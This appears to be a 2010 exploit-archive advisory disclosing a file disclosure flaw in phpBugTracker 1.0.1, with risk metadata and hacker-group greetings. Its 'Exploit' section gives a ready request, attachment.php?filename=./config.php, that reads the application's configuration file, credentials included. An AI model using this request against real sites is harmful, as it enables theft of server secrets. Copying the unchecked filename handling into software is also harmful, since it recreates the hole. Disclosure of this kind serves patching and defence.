phpBugTracker 1.0.1 file disclosure

2010-02-22 / 2010-02-23

Credit: ViRuSMaN

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

==============================================================================
        [?] ~ Note : [ Tribute to the martyrs of Gaza . ]
==============================================================================
        [?] phpBugTracker v1.0.1 File Disclosure Vulnerability
==============================================================================

    [?] Script:             [ phpBugTracker ]
    [?] Language:           [ PHP ]
    [?] Download:           [ http://ftp5.ru.freebsd.org/pub/FreeBSD/distfiles/phpbt-1.0.1.tar.gz ]
    [?] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
    [?] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & Pentestlabs.Com ]
    [?] My Home:            [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

    [?] http://[target].com/[path]/attachment.php?filename=./config.php




Author: ViRuSMaN <-

###########################################################################
________________________________
Hotmail: Free, trusted and rich email service. Get it now.<https://signup.live.com/signup.aspx?id=60969>

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

phpBugTracker 1.0.1 file disclosure

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.